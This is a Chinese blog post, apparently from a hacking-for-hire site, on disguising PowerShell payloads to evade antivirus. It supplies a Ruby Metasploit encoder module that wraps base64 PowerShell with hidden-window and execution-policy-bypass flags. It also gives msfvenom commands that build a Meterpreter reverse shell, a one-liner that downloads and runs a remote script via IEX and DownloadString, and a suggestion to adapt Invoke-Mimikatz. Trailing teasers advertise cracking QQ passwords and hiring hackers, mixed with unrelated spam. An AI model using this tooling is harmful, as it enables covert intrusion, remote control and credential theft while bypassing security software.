关于Powershell对抗安全软件

hacker4年前关于黑客接单344

  Windows PowerShell是以.NET Framework技术为基础,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术。

  同时也包含了数种系统管理工具、简易且一致的语法,提升管理者处理,常见如登录数据库、WMI。Exchange Server 2007以及System Center Operations Manager 2007等服务器软件都将内置Windows PowerShell。

  Windows PowerShell的强大,并且内置,在渗透过程中,也让渗透变得更加有趣。而安全软件的对抗查杀也逐渐开始针对powershell的一切行为。

  

  在https://technet.microsoft.com,看到文档如下:

  Here is a listing of the available startup parameters:

  -Command Specifies the command text to execute as though it were typed at the PowerShell command prompt.

  -EncodedCommand Specifies the base64-encoded command text to execute.

  -ExecutionPolicy Sets the default execution policy for the console session.

  -File Sets the name of a script fi le to execute.

  -InputFormat Sets the format for data sent to PowerShell as either text string or serialized XML. The default format is XML. Valid values are text and XML.

  -NoExit Does not exit after running startup commands. This parameter is useful when you run PowerShell commands or scripts via the command prompt (cmd.exe).

  -NoLogo Starts the PowerShell console without displaying the copyright banner.

  -Noninteractive Starts the PowerShell console in non-interactive mode. In this mode, PowerShell does not present an interactive prompt to the user.

  -NoProfile Tells the PowerShell console not to load the current user’s profile.

  -OutputFormat Sets the format for output as either text string or serialized XML. The default format is text. Valid values are text and XML.

  -PSConsoleFile Loads the specified Windows PowerShell console file. Console files end with the .psc1 extension and can be used to ensure that specific snap-in extensions are loaded and available. You can create a console file using Export-Console in Windows PowerShell.

  -Sta Starts PowerShell in single-threaded mode.

  -Version Sets the version of Windows PowerShell to use for compatibility, such as 1.0.

  -WindowStyle Sets the window style as Normal, Minimized, Maximized, or Hidden. The default is Normal.

  针对它的特性,本地测试:

  Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('Micropoor')

  

  

  上文所说,越来越多的杀软开始对抗,powershell的部分行为,或者特征。以msfvenom为例,生成payload。 https://www.secpulse.com/archives/71225.html

  micropoor.ps1不幸被杀。

  

  

  针对powershell特性,更改payload

  

  接下来考虑的事情是如何把以上重复的工作变成自动化,并且针对powershell,DownloadString特性,设计出2种payload形式:

  (1)目标机出网

  (2)目标机不出网

  并且根据需求,无缝连接Metasploit。https://www.secpulse.com/archives/71225.html

  根据微软文档,可以找到可能对以上有帮助的属性,分别为:

  WindowStyle

  NoExit

  EncodedCommand

  exec

  自动化实现如下:

  # copy base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.

  # E.g

  # msf encoder(powershell/base64) > use exploit/multi/handler

  # msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

  # payload => windows/x64/meterpreter/reverse_tcp

  # msf exploit(multi/handler) > exploit

  # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.

  # [*] Started reverse TCP handler on xx.1xx.xx.xx:xx

  class MetasploitModule < Msf::Encoder

  Rank = NormalRanking

  def initialize

  super(

  'Name' => 'Powershell Base64 Encoder',

  'Description' => %q{

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.

  },

  'Author' => 'Micropoor',

  'Arch' => ARCH_CMD,

  'Platform' => 'win')

  register_options([

  OptBool.new('payload', [ false, 'Use payload ', false ]),

  OptBool.new('x64', [ false, 'Use syswow64 powershell', false ])

  ])

  end

  def encode_block(state, buf)

  base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(buf))

  cmd = ''

  if datastore['x64']

  cmd += 'c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '

  else

  cmd += 'powershell.exe '

  end

  if datastore['payload']

  cmd += '-windowstyle hidden -exec bypass -NoExit '

  end

  cmd += "-EncodedCommand #{base64}"

  end

  end

  # if use caidao

  # execute echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\"" |msfvenom -e x64/xor4 --arch x64 --platform windows

  # xxx.ps1 is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.

  copy powershell_base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.

  参数 payload 选择是否使用Metasploit payload,来去掉powershell的关键字。

  例1(目标出网,下载执行):

  echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/micropoor.ps1');\"" |msfvenom -e powershell/base64 --arch x64 --platform windows

  

  

  例2(目标不出网,本地执行)

  

  注:加payload参数

  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=8080 -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows payload

  更多有趣的实验:

  把例1的down内容更改为例2,并且去掉payload参数。来减小payload大小。

  更改Invoke-Mimikatz.ps1等。

  

  参考致谢

  https://technet.microsoft.com/en-us/library/ff629472.aspx

  https://www.secpulse.com/archives/tag/powershell

  https://github.com/danielbohannon/Invoke-Obfuscation

标签: 渗透测试

相关文章

强行修改对方qq密码在线(如何查看对方qq密码)

首先,从科学跟技术的正常角度来说,这需要花很大的功夫,就像要你学会编程一样长的时间,说到这里,你认为你自己能轻易学会编程吗?我只是举例,因为如果你想。 在线时候无法产看QQ密码,可以修改QQ密码。找回...

网上一般哪里找黑客,装逼伪黑客网站

一、网上一般哪里怎么找黑客 1、黑客网站但在媒体报道中,黑客这个词常常指的是软件可怕的软件。网上一般哪里专业的俄罗斯黑客成功劫持了WindowsUpdate下载。网站黑客打开自动接收订单的城市可以单击...

实力唱作人歌手制作人李俊毅携新歌《多想》,

“勾着手一步一步一步一步,你身边环绕,感觉到哎一点一点一点点的明了......”这首来自于播放量超十亿的热剧《致我们暖暖的小时光》的片尾曲《两人份美好》,这首歌曲一举斩获亚洲新歌榜TOP1。歌曲的原唱...

神经性皮炎偏方大全(神经性皮炎症状和治疗期

神经性皮炎偏方大全(神经性皮炎症状和治疗期

神经性皮炎怎么回事? 1.精神因素 目前认为是发生本病的主要诱因,情绪波动、精神过度紧张、焦虑不安、生活环境突然变化等均可使病情加重和反复。 2.胃肠道功能障碍、内分泌系统功能异常、体内慢性...

黑客找游戏密码-手机被黑客入侵怎么解决(黑客入侵手机怎么解决?)

黑客找游戏密码-手机被黑客入侵怎么解决(黑客入侵手机怎么解决?)

黑客找游戏密码相关问题 黑客入侵手机能看到微信聊天吗相关问题 黑客锁屏的密码是什么意思 网站被黑客攻击里面的钱怎么办(黑客攻击模拟网站)...

到QQ号的黑客,微信客户端黑客版,黑客修改学校网络密码教程

测验对其进行反编译,能够运用PyInstaller的archive_viewer脚本提取对应的pyc脚本,但因为脚本运转是需求用户交互指定反编译文件名,所以能够定制代码将所需求反编译的pyc悉数提取,...